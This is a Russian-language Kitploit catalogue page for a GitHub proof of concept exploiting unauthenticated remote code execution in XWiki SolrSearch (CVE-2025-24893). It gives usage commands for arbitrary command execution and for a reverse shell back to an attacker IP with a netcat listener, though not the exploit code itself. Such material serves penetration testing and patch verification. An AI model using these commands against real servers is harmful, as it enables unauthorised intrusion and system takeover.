Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
xwiki_solrsearch-rce-exploit — PoC неавторизованного RCE для XWiki SolrSearch (CVE-2025-24893). Выполнение команд + обратная оболочка. | Kitploit
Инструменты/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

PoC неавторизованного RCE для XWiki SolrSearch (CVE-2025-24893). Выполнение команд + обратная оболочка.

Репозиторий
1129 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

solrsearch-rce-exploit

Неавторизованный RCE PoC для XWiki SolrSearch (CVE-2025-24893). Выполнение команд + обратный шелл.

CVE-2025-24893 – PoC RCE для XWiki SolrSearch

Доказательство концепции (PoC) для инъекции шаблонов XWiki SolrSearch, приводящей к неавторизованному удалённому выполнению кода.

Протестировано на XWiki Debian 15.10.8 (исправлено в версиях 15.10.11 / 16.4.1 / 16.5.0RC1).

⚠️ Только для образовательных целей. Не запускайте это против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Что делает

  • Отправляет специально сформированные Groovy-полезные нагрузки через /xwiki/bin/get/Main/SolrSearch.
  • Выполняет произвольные команды и оборачивает вывод в маркеры Base64 для чистого декодирования.
  • Поддерживает запуск обратного шелла с использованием Java-сокетов.

Требования

  • Python 3.x
  • Установите зависимости с помощью:
root@kitploit:~
pip install requests

Использование

Укажите целевой хост (и опциональный путь) при запуске скрипта.

Запуск базовых команд:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

Запуск обратного шелла:

root@kitploit:~
# На атакующей машине
nc -lvnp 4444

# Из PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

Примечания

  • Эндпоинт: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • Чистый вывод Base64 обеспечивает надёжный разбор.
  • Изначально продемонстрировано на HTB Editor, но применимо к другим уязвимым экземплярам.
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
Скачать инструмент